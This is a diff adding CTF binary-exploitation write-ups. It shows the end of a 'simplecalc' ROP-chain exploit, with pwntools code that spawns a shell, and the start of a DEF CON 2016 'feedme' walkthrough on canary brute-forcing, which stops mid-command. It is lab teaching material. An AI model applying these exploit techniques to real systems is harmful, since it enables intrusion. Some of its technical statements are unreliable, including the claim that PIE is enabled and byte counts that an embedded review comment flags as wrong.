+ 0x000000000046277d : mov qword ptr [rax], rdx ; mov qword ptr [rax + 0x40], rsi ; jmp 0x46272c
+ 0x000000000040a3ee : mov qword ptr [rax], rdx ; mov qword ptr [rax + 8], rdx ; jmp 0x40a102
+ 0x000000000047efb8 : mov qword ptr [rax], rdx ; pop rbx ; ret
+
+ **0x000000000044526e : mov qword ptr [rax], rdx ; ret**
+
+ 0x0000000000462730 : mov qword ptr [rax], rdx ; xor eax, eax ; ret
+
+
+
+So here we see at the address **0x0044526e** that this mov instruction will move the value of rdx into the memory address that is pointed by rax. This is also convenient because we have gadgets for the rdx and rax registers. The last gadget we need is a syscall gadget:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → ROPgadget --binary simplecalc | grep ": syscall"
+ 0x0000000000400488 : syscall
+
+
+
+We don't have a choice here, the only syscall is at **0x00400488** , Now we need to figure out where in memory we will write the string **/bin/sh** So we need to check the memory mappings while the binary is running:
+
+
+ gef➤ vmmap
+ [ Legend: Code | Heap | Stack ]
+ Start End Offset Perm Path
+ 0x0000000000400000 0x00000000004c1000 0x0000000000000000 r-x /home/nothing/binexp/2/calc/simplecalc
+ 0x00000000006c0000 0x00000000006c3000 0x00000000000c0000 rw- /home/nothing/binexp/2/calc/simplecalc
+ 0x00000000006c3000 0x00000000006e9000 0x0000000000000000 rw- [heap]
+ 0x00007ffff7ff9000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
+ 0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
+ 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
+ 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 --x [vsyscall]
+
+
+
+We see that the memory region begins at **0x6c1000** and ends at **0x6c3000** the permissions allow us to read and write to it, and in addition, that is mapped from the binary. Since there is no PIE the addresses will be the same everytime, therefore we don't need an infoleak. Here we want to take a look at the memory addresses after**0x6c0000** to see if we can find an empty space where we can write our stuff:
+
+
+ gef➤ x/g 0x6c0000
+ 0x6c0000: 0x200e41280e41300e
+
+ gef➤ x/20g 0x6c0000
+ 0x6c0000: 0x200e41280e41300e 0xe42100e42180e42
+ 0x6c0010: 0xb4108 0xd0a40000002c
+ 0x6c0020: 0x6cfffd1fd0 0x80e0a69100e4400
+ 0x6c0030: 0xb42080e0a460b4b 0xe470b49080e0a57
+ 0x6c0040: 0x8 0xd0d400000024
+ 0x6c0050: 0x144fffd2010 0x5a020283100e4500
+ 0x6c0060: 0xee3020b41080e0a 0x8
+ 0x6c0070: 0xd0fc00000064 0x26cfffd2138
+ 0x6c0080: 0xe47028f100e4200 0x48d200e42038e18
+ 0x6c0090: 0x300e41058c280e42 0x440783380e410686
+
+ gef➤ x/20g 0x6c1000
+ 0x6c1000: 0x0 0x0
+ 0x6c1010: 0x0 0x431070
+ 0x6c1020: 0x430a40 0x428e20
+ 0x6c1030: 0x4331b0 0x424c50
+ 0x6c1040: 0x42b940 0x423740
+ 0x6c1050: 0x4852d0 0x4178d0
+ 0x6c1060: 0x0 0x0
+ 0x6c1070 <****_dl_tls_static_size>: 0x1180 0x0
+ 0x6c1080 <****_nl_current_default_domain>: 0x4945f7 0x0
+ 0x6c1090 <****locale_alias_path.10061>: 0x49462a 0x6c32a0
+
+It looks like **0x6c1000** is empty, so we should be able to write to it without messing up anything.
+
+Now we need to worry about what deals with what we are overflowing onto the stack:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined4 Stack[-0xc]:4 local_c XREF[7]: 00401443(W),
+ 00401481(R),
+ 004014af(R),
+ 004014dd(R),
+ 00401508(R),
+ 00401567(RW),
+ 0040156e(R)
+ undefined8 Stack[-0x18]:8 local_18 XREF[8]: 0040143f(W),
+ 0040148e(R),
+ 004014bc(R),
+ 004014ea(R),
+ 00401515(R),
+ 00401537(R),
+ 0040154a(R),
+ 00401577(R)
+ undefined4 Stack[-0x1c]:4 local_1c XREF[7]: 00401392(W),
+ 004013e9(*),
+ 00401409(R),
+ 00401413(R),
+ 0040142f(R),
+ 0040152e(R),
+ 0040156b(R)
+ undefined4 Stack[-0x20]:4 local_20 XREF[6]: 00401454(*),
+ 00401474(R),
+ 004014a2(R),
+ 004014d0(R),
+ 004014fb(R),
+ 00401526(R)
+ undefined1 Stack[-0x48]:1 local_48 XREF[1]: 0040153b(*)
+ undefined4 Stack[-0x4c]:4 local_4c XREF[1]: 0040138b(W)
+ undefined8 Stack[-0x58]:8 local_58 XREF[1]: 0040138e(W)
+ main XREF[4]: Entry Point(*),
+ _start:00400f6b(*),
+ _start:00400f6b(*), 004b3078(*)
+ 00401383 55 PUSH RBP
+
+
+
+
+ if (local_20 == 5) {
+ memcpy(local_48,local_18,(long)(local_1c << 2));
+ free(local_18);
+ return 0;
+ }
+
+
+So here we see that between the vulnerable buffer **local_48** (which is handled inside of the vulnerable memcpy call we saw earlier) and the bottom of the stack there is the **local_18** pointer that contains our calculations. It will get overwritten as part of the overflow. This is a problem since this address is freed prior to our code being executed as you can see above.
+
+Now the trick here was that you needed to take a look at the [sourcecode](https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#free) of the free functioni (lines 3092- 3103):
+
+
+ void
+ __libc_free (void *mem)
+ {
+ mstate ar_ptr;
+ mchunkptr p; /* chunk corresponding to mem */
+ void (*hook) (void *, const void *)
+ = atomic_forced_read (__free_hook);
+ if (__builtin_expect (hook != NULL, 0))
+ {
+ (*hook)(mem, RETURN_ADDRESS (0));
+ return;
+
+
+Here you see that if the arguement to the free() function is a null pointer (0x0) then it just returns. Since the function writing the data for the overflow is memcpy, we can just write null bytes. So if we just fill up the space between the start of our input and the return address with null bytes, we will be fine. With that, we can now create the exploit including the ROP chain to spawn a shell and print out the flag:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/calc]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ #target is the variable for the process ./simplecalc
+ target = process('./simplecalc')
+
+ #recieve text until calculations:
+ target.recvuntil('calculations: ')
+ #we want 100 calculations)
+ target.sendline('100')
+
+
+
+
+Now here we use the 'target' variable to follow the process of our binary, we want to recieve the output text until 'calculations: ', Then we want to send '100' as our choice for calculations. Next we will setup our rop gadgets:
+
+
+ # Establish our rop gadgets
+ popRax = 0x44db34
+ popRdi = 0x401b73
+ popRsi = 0x401c87
+ popRdx = 0x437a85
+
+ # 0x000000000044526e : mov qword ptr [rax], rdx ; ret
+ movGadget = 0x44526e
+ syscall = 0x400488
+
+
+
+So here we set the constants we found earlier the addresses of the Rax, rdi, rsi and rdx gadgets, as well as the movGadget and the syscall we need. Next we need to submit an 'addition'(option 1) to the binary file of x=100 and y=arguement - 100:
+
+
+ def addSingle(x):
+ target.recvuntil("=> ")
+ target.sendline("1")
+
+ target.recvuntil("Integer x: ")
+ target.sendline("100")
+
+ target.recvuntil("Integer y: ")
+ target.sendline(str(x - 100)) #making use the arguement being passed into the function here
+
+
+
+And the second function makes use of the function we defined above:
+
+
+ def add(z):
+ x = z & 0xffffffff
+ y = ((z & 0xffffffff00000000) >> 32)
+ addSingle(x)
+ addSingle(y)
+
+ # Fill up the space between the start of our input and the return address
+ for i in range(9):
+ # Fill it up with null bytes, to make the ptr passed to free be a null pointer
+ # So free doesn't crash
+ add(0x0)
+
+
+
+This will make sure we fill up the space between the start of our input and the return address with 9 nullbytes to make the ptr passed to the free() function be a null pointer. The add() function that is defined here makes use of addSingle() that we defined above. These 2 additions will nake sure that we give input via addition, and next we need to make our actual ROP chain:
+
+
+ #Write "/bin/sh" to 0x6c1000
+
+ #pop rax, 0x6c1000 ; ret
+ #pop rdx, "/bin/sh\x00" ; ret
+ #mov qword ptr [rax], rdx ; ret
+
+
+ add(popRax)
+ add(0x6c1000)
+
+ add(popRdx)
+ add(0x0068732f6e69622f) # "/bin/sh" in hex
+
+
+
+
+This will make use of the 'add' function we defined above, to put the value of popRax(0x44db34) to the ROPchain, as well as our actual shellcode:
+
+
+ # Move the needed values into the registers
+ #pop rax, 0x3b ; ret
+ #pop rdi, 0x6c1000 ; ret
+ #pop rsi, 0x0 ; ret
+ #pop rdx, 0x0 ; ret
+
+ add(movGadget)
+
+ add(popRax) # Specify which syscall to make
+ add(0x3b)
+
+ add(popRdi) # Specify pointer to "/bin/sh"
+ add(0x6c1000)
+
+ add(popRsi) # Specify no arguments or environment variables
+ add(0x0)
+ add(popRdx)
+ add(0x0)
+
+ add(syscall) # Syscall instruction
+
+
+
+We specify the syscall ID into rax, the first arguement (/bin/sh) into rdi, and then both rsi and rdx (2nd and 3rd arguements) contain nullbytes. And lastly we make the syscall to end our ropchain.
+
+
+ target.sendline('5') # Save and exit to execute memcpy and trigger buffer overflow
+
+ # Drop to an interactive shell to use our new shell
+ target.interactive()
+
+
+
+At last, once we finished feeding the ropchain into the binary, we get to the memcpy call to trigger it and then drop into an interactive shell:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/calc]
+ → python3 exploit.py
+ [+] Starting local process './simplecalc': pid 3475833
+ [*] Switching to interactive mode
+ Result for x + y is 0.
+
+ Options Menu:
+ [1] Addition.
+ [2] Subtraction.
+ [3] Multiplication.
+ [4] Division.
+ [5] Save and Exit.
+ => $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+
+
+
+And that's it! We have been able to print spawn a shell and print out the contents of the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
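Review bot: the glibc excerpt quoted for __libc_free (introduced as "lines 3092- 3103") shows only the __free_hook branch and contains no null-pointer check, so it does not support the sentence that follows it ("if the arguement to the free() function is a null pointer (0x0) then it just returns"); extend the excerpt to the early return on a null `mem` argument that the exploit actually relies on, and fix the spelling of "arguement", "functioni", "recieve" and "nake" while there. Three numeric statements also contradict the command output printed beside them: "0x198 0f92 is 7 bytes long" and "end up with 8 bytes" are counting hex digits, not bytes, and the output `[+] Searching '\x92\x0f\x98\x01' in memory` shows the padded pattern is 4 bytes; "the memory region begins at 0x6c1000 and ends at 0x6c3000" disagrees with the vmmap line `0x00000000006c0000 0x00000000006c3000 ... rw-` and with the next sentence's "after 0x6c0000"; and "move 4 bytes from rdx" contradicts the chosen `mov qword ptr [rax], rdx ; ret`, which stores 8 bytes. That 8-byte store is also why the x/20g dump deserves a sentence: only 0x6c1000 through 0x6c1017 reads as zero, and 0x6c1018 onward already holds pointers such as 0x431070, so the "/bin/sh\x00" qword fits but nothing longer should be written there. Finally, "fill up ... with 9 nullbytes" should read 9 zero qwords (the range(9) loop of add(0x0) writes 9 x 8 = 72 = 0x48 bytes, the offset computed earlier), and "print spawn a shell" in the closing sentence has a stray word.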
diff --git a/2/feed.md b/2/feed.md
new file mode 100644
index 0000000..b4604fb
--- /dev/null
+++ b/2/feed.md
@@ -0,0 +1,688 @@
+# DCQuals 2016 FeedMe
+
+Yet another insane challenge, buckle up !
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals16_feedme/feedme
+ --2021-03-06 11:21:19-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/07-bof_static/dcquals16_feedme/feedme
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals16_feedme/feedme [following]
+ --2021-03-06 11:21:20-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/07-bof_static/dcquals16_feedme/feedme
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 664792 (649K) [application/octet-stream]
+ Saving to: ‘feedme’
+
+ feedme 100%[=======================================================================================================================================================>] 649.21K --.-KB/s in 0.1s
+
+ 2021-03-06 11:21:20 (5.42 MB/s) - ‘feedme’ saved [664792/664792]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → file feedme
+ feedme: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → chmod +x feedme
+
+
+
+` ![]()
+
+## Solution
+
+First let's run the binary to see what it does after using pwn checksec on it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → pwn checksec feedme
+ [*] '/home/nothing/binexp/2/feed/feedme'
+ Arch: i386-32-little
+ RELRO: No RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → ./feedme
+ FEED ME!
+ yes
+ no
+ yes
+ no
+ yes
+ no
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
+ ^C
+
+
+
+Here we see that we are dealing with a 32bit statically linked binary, with a non executable stack (NX). When we run it, the program prompts us with some text before we can give some input, it seems to be able to take in a certain amount of input, so let's see how much:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/14 ] [binexp/2/feed]
+ → ./feedme
+ FEED ME!
+ 000000000000000000000000000000000
+ 000000000000000000000000000000000
+ ATE 30303030303030303030303030303030...
+ *** stack smashing detected ***: ./feedme terminated
+ Child exit.
+ FEED ME!
+
+
+
+Apparently we are able to overwrite a stack canary, so we probably have a stack buffer overflow somewhere. In addition to that, when it detected that the stack canary was overwritten, it terminated the process and kept asking for more input. The binary is probably designed in such a way that it spawns child processes which is where we scan in the input and overwrite the stack canary. When the program sees tha tthe stack canary got edited, it terminates the child process, and the parent process spawns another instance and continues asking us for input. So let's take a look at the binary inside of ghidra:
+
+
+
+Once again, the main function is not called 'main' so we find it by searching for the text that the binary outputs, (CTRL+SHIFT+E) and we find the following:
+
+
+ uint FUN_08049036(void)
+
+ {
+ byte bVar1;
+ undefined4 uVar2;
+ uint uVar3;
+ int in_GS_OFFSET;
+ undefined local_30 [32];
+ int local_10;
+
+ local_10 = *(int *)(in_GS_OFFSET + 0x14);
+ FUN_0804fc60("FEED ME!");
+ bVar1 = FUN_08048e42();
+ FUN_08048e7e(local_30,bVar1);
+ uVar2 = FUN_08048f6e(local_30,bVar1,0x10);
+ FUN_0804f700("ATE %s\n",uVar2);
+ uVar3 = (uint)bVar1;
+ if (local_10 != *(int *)(in_GS_OFFSET + 0x14)) {
+ uVar3 = FUN_0806f5b0();
+ }
+ return uVar3;
+ }
+
+
+
+Here we see that much like our previous challenge, there aren't any scanf nor any gets first off, our input text (most probably **local_32** which can hold 32 bytes) gets passed into the **FUN_08048f6e** function along with the value returned by the **FUN_08048e42()** function and the hex value **0x10**.
+
+We also see that the function**FUN_08048f6e(local_30,bVar1,0x10);** takes in our input value as well as a limit of 16 (0x10) bytes of input, that function returns a pointer to 16 bytes of our input, so let's look at it from gdb:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → gdb ./feedme
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./feedme...
+ (No debugging symbols found in ./feedme)
+ gef➤ set follow-fork-mode child
+ gef➤ show follow-fork mode
+ Debugger response to a program call of fork or vfork is "child".
+
+
+
+Now here we basically set gdb so that it follows the forks created by the binary file, now we need breakpoints:
+
+
+
+Now we know where we want our 3 breakpoints:
+
+
+ 1) 0x8049053
+ 2) 0x8049069
+ 3) 0x8049069
+
+
+
+So we continue with gdb:
+
+
+ gef➤ set follow-fork-mode child
+ gef➤ show follow-fork mode
+ Debugger response to a program call of fork or vfork is "child".
+ gef➤ b *0x8049053
+ Breakpoint 1 at 0x8049053
+ gef➤ b *0x8049069
+ Breakpoint 2 at 0x8049069
+ gef➤ b *0x8049084
+ Breakpoint 3 at 0x8049084
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/feed/feedme
+ [Attaching after process 3458879 fork to child process 3458883]
+ [New inferior 2 (process 3458883)]
+ [Detaching after fork from parent process 3458879]
+ [Inferior 1 (process 3458879) detached]
+ FEED ME!
+ [Switching to process 3458883]
+
+ Thread 2.1 "feedme" hit Breakpoint 1, 0x08049053 in ?? ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0x9
+ $ebx : 0x080481a8 → push ebx
+ $ecx : 0x080eb4d4 → 0x00000000
+ $edx : 0x9
+ $esp : 0xffffd080 → 0x080be70c → "FEED ME!"
+ $ebp : 0xffffd0c8 → 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $esi : 0x0
+ $edi : 0x080ea00c → 0x08067f90 → mov edx, DWORD PTR [esp+0x4]
+ $eip : 0x08049053 → 0xfffdeae8 → 0x00000000
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd080│+0x0000: 0x080be70c → "FEED ME!" ← $esp
+ 0xffffd084│+0x0004: 0x00000000
+ 0xffffd088│+0x0008: 0x00000000
+ 0xffffd08c│+0x000c: 0x0806ccb7 → sub esp, 0x20
+ 0xffffd090│+0x0010: 0x080ea200 → 0xfbad2887
+ 0xffffd094│+0x0014: 0x080ea247 → 0x0eb4d40a
+ 0xffffd098│+0x0018: 0x080ea248 → 0x080eb4d4 → 0x00000000
+ 0xffffd09c│+0x001c: 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0x8049041 add BYTE PTR [ecx-0x3fce0bbb], cl
+ 0x8049047 mov DWORD PTR [esp], 0x80be70c
+ 0x804904e call 0x804fc60
+ ●→ 0x8049053 call 0x8048e42
+ ↳ 0x8048e42 push ebp
+ 0x8048e43 mov ebp, esp
+ 0x8048e45 sub esp, 0x28
+ 0x8048e48 mov DWORD PTR [esp+0x8], 0x1
+ 0x8048e50 lea eax, [ebp-0xd]
+ 0x8048e53 mov DWORD PTR [esp+0x4], eax
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
+ 0x8048e42 (
+ )
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "feedme", stopped 0x8049053 in ?? (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x8049053 → call 0x8048e42
+ [#1] 0x80490dc → movzx eax, al
+ [#2] 0x80491da → mov eax, 0x0
+ [#3] 0x80493ba → mov DWORD PTR [esp], eax
+ [#4] 0x8048d2b → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+After a bit of gdb wizardry that i don't even understand, we arrive at this:
+
+
+ gef➤ x/4w $esp
+ 0xffffd080: 0xffffd09c 0x31 0x10 0x806ccb7
+
+ gef➤ x/50w 0xffffd09c
+ 0xffffd09c: 0x77322f78 0x73652420 0xa0a0a70 0xa0a0a0a
+ 0xffffd0ac: 0xa0a0a0a 0x6e69660a 0xa687369 0x300a300a
+ 0xffffd0bc: 0x30303030 0x30303030 0x30303030 0x30303030
+ 0xffffd0cc: 0x8049030 0x80ea0a0 0x0 0x80ed840
+ 0xffffd0dc: 0x804f8b4 0x0 0x0 0x0
+ 0xffffd0ec: 0x80481a8 0x80481a8 0x0 0xffffd118
+ 0xffffd0fc: 0x80491da 0x80ea0a0 0x0 0x2
+ 0xffffd10c: 0x0 0x0 0x80ea00c 0x8049970
+ 0xffffd11c: 0x80493ba 0x1 0xffffd1a4 0xffffd1ac
+ 0xffffd12c: 0x0 0x0 0x80481a8 0x0
+ 0xffffd13c: 0x80ea00c 0x8049970 0x488454cd 0xbe00e522
+ 0xffffd14c: 0x0 0x0 0x0 0x0
+ 0xffffd15c: 0x0 0x0
+
+ gef➤ info frame
+ Stack level 0, frame at 0xffffd0d0:
+ eip = 0x8049084; saved eip = 0x8049030
+ called by frame at 0x30303038
+ Arglist at 0xffffd0c8, args:
+ Locals at 0xffffd0c8, Previous frame's sp is 0xffffd0d0
+ Saved registers:
+ ebp at 0xffffd0c8, eip at 0xffffd0cc
+
+
+
+The start of our input is being scanned at **0xffffd09c** and the return address is at **0xffffd0cc** , Somehow you have to find that the stack canary is some random hex value, at some memory address because it's 4 bytes of random values with the last value being a nullbyte. and that there is a 0x20 byte offset to the stack canary and :
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/feed]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+
+ >>> hex( 0xffffd0cc - 0xffffd09c )
+ '0x30'
+
+
+
+Now we know that there is a 0x30 bytes offset to the return address. Both the 0x30 and the 0x20 offset are within the reach of our buffer overflow Lastly we need to know where the feed function is called:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → gdb ./feedme
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./feedme...
+ (No debugging symbols found in ./feedme)
+ gef➤ b *0x8049053
+ Breakpoint 1 at 0x8049053
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/feed/feedme
+ [Detaching after fork from child process 3730383]
+ FEED ME!
+ ^C
+ Program received signal SIGINT, Interrupt.
+ 0xf7ffc549 in __kernel_vsyscall ()
+ ~/.gef-54e93efd89ec59e5d178fbbeda1fed890098d18d.py:2425: DeprecationWarning: invalid escape sequence '\$'
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $eax : 0xfffffe00
+ $ebx : 0x38ebcf
+ $ecx : 0xffffd0e0 → 0x00000000
+ $edx : 0x0
+ $esp : 0xffffd0b8 → 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $ebp : 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx
+ $esi : 0x0
+ $edi : 0x080ea00c → 0x08067f90 → mov edx, DWORD PTR [esp+0x4]
+ $eip : 0xf7ffc549 → <__kernel_vsyscall+9> pop ebp
+ $eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0xffffd0b8│+0x0000: 0xffffd0f8 → 0xffffd118 → 0x08049970 → push ebx ← $esp
+ 0xffffd0bc│+0x0004: 0x00000000
+ 0xffffd0c0│+0x0008: 0xffffd0e0 → 0x00000000
+ 0xffffd0c4│+0x000c: 0x0806cc02 → pop ebx
+ 0xffffd0c8│+0x0010: 0x080481a8 → push ebx
+ 0xffffd0cc│+0x0014: 0x0804910e → mov DWORD PTR [ebp-0xc], eax
+ 0xffffd0d0│+0x0018: 0x0038ebcf
+ 0xffffd0d4│+0x001c: 0xffffd0e0 → 0x00000000
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+ 0xf7ffc543 <__kernel_vsyscall+3> mov ebp, esp
+ 0xf7ffc545 <__kernel_vsyscall+5> sysenter
+ 0xf7ffc547 <__kernel_vsyscall+7> int 0x80
+ → 0xf7ffc549 <__kernel_vsyscall+9> pop ebp
+ 0xf7ffc54a <__kernel_vsyscall+10> pop edx
+ 0xf7ffc54b <__kernel_vsyscall+11> pop ecx
+ 0xf7ffc54c <__kernel_vsyscall+12> ret
+ 0xf7ffc54d nop
+ 0xf7ffc54e nop
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "feedme", stopped 0xf7ffc549 in __kernel_vsyscall (), reason: SIGINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0xf7ffc549 → __kernel_vsyscall()
+ [#1] 0x806cc02 → pop ebx
+ [#2] 0x804910e → mov DWORD PTR [ebp-0xc], eax
+ [#3] 0x80491da → mov eax, 0x0
+ [#4] 0x80493ba → mov DWORD PTR [esp], eax
+ [#5] 0x8048d2b → hlt
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ bt
+ #0 0xf7ffc549 in __kernel_vsyscall ()
+ #1 0x0806cc02 in ?? ()
+ #2 0x0804910e in ?? ()
+ #3 0x080491da in ?? ()
+ #4 0x080493ba in ?? ()
+ #5 0x08048d2b in ?? ()
+
+
+
+So here we basically set only the first breakpoint, and hit CTRL+C to exit out of the 'feedme' prompt and then run 'bt' so that we can follow the backtrace to the parent function that we can also find if we look for (CTRL+SHIFT+E) **'Child IO error!'** :
+
+
+
+So we get the following code:
+
+
+ void FUN_080490b0(void)
+
+ {
+ undefined uVar1;
+ int local_1c;
+ uint local_18;
+ int local_14;
+ int local_10;
+
+ local_1c = 0;
+ local_18 = 0;
+ while( true ) {
+ if (799 < local_18) {
+ return;
+ }
+ local_14 = FUN_0806cc70();
+ if (local_14 == 0) break;
+ local_10 = FUN_0806cbe0(local_14,&local;_1c,0);
+ if (local_10 == -1) {
+ FUN_0804fc60("Wait error!");
+ FUN_0804ed20(0xffffffff);
+ }
+ if (local_1c == -1) {
+ FUN_0804fc60("Child IO error!");
+ FUN_0804ed20(0xffffffff);
+ }
+ FUN_0804fc60("Child exit.");
+ FUN_0804fa20(0);
+ local_18 = local_18 + 1;
+ }
+ uVar1 = FUN_08049036();
+ FUN_0804f700("YUM, got %d bytes!\n",uVar1);
+ return;
+ }
+
+
+Here we see that it is calling the function responsible for setting up a child process in a loop that will run for 800 times, that means we can crash a child process 800 times before the program exits on us, So how do we exploit it?
+
+So first, with the stack canary, we have the ability to overwrite the return address. The only thing stopping us other than the NX is the stack canary that we can bruteforce. The problem is that all of the child process will share the same canary. For the canary it will have 4 bytes, one null byte and 3 random bytes, so only 3 bytes that we do not know.
+
+So we can overwrite the stack canary one byte a a time, The byte we overwrite it with will be a wild guess, if one child process dies we know that it was incorrect, and if it doesn't then we will know what our guess was correct. There are 256 different values that the byte can be, and since there are 3 bytes we are guessing that gives us a 256 * 3 = 768 possible guesses every combination if we guess one byte a a time. This can be done by only overwriting one byte at a time. with that we can deal with the stack canary.
+
+Now onto the ROP chain: Once we have the stack canary and nothing will be able to stop us from reaching the return function to get code execution as usual. Then what do we execute ? NX is turned on, so we cannot just jump to the shellcode we place on the stack. However the elf does have PIE set to enabled which randomizes the address of code, Therefore building a ROP chain without an infoleak is possible. For this ROP Chain, we will be making an execve() syscall to /bin/sh to give us a shell.
+
+Now to build our ROP chain we need to look for ROP Gadgets as we saw in the previous 2 challenges. We will use ROPGadget for that, check out [simplecalc](calc.html) to check out how i installed it. now let's find the following gadgets:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep "mov.*\[eax\].*; ret$"
+
+ [...]
+
+ 0x0807be31 : mov dword ptr [eax], edx ; ret
+
+ [...]
+
+
+
+Here's an useful gadget because this will allow us to move the contents of the edx register into the area of space pointed to by the address of eax, and then return. So if we wanted to write to the address 1234 wec ould load that address into eax and the value we wanted to write into the edx register, then call this gadget.
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep ": pop eax ; ret$"
+ 0x080bb496 : pop eax ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep ": pop edx ; ret$"
+ 0x0806f34a : pop edx ; ret
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
